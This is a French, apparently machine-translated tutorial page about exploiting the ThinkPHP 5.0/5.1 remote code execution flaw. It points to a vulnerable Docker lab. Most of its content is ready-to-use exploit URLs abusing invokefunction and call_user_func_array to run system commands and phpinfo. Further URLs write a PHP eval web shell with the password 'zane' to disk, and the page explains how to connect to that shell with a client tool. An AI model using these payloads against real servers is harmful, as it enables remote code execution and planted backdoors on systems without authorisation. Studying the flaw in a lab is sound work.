Maison > cadre php > PensezPHP > le corps du texte

À propos de l'exploitation des vulnérabilités ThinkPHP

藏色散人
Libérer: 2020-08-31 13:37:53
avant
2986 Les gens l'ont consulté

Ce qui suit est une introduction à l'exploitation des vulnérabilités ThinkPHP à partir de la colonne du didacticiel du framework thinkphp. J'espère que cela sera utile aux amis dans le besoin !

À propos de l'exploitation des vulnérabilités ThinkPHP

Vulnérabilité d'exécution de thinkphp_5x_command

Les versions concernées incluent les versions 5.0 et 5.1

Code source de l'environnement de vulnérabilité Docker :
https://github.com/vulnspy/thinkphp-5.1.29
Construction de l'environnement local :
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

Utiliser la fonction système à distance exécution de la commande

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Écrire les informations phpinfo() via la fonction phpinfo

EXP :
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Écrivez shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
Copier après la connexion

Utilisez un couteau de cuisine pour vous connecter
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php Le mot de passe est zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php Le mot de passe est zane
`

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:cnblogs.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal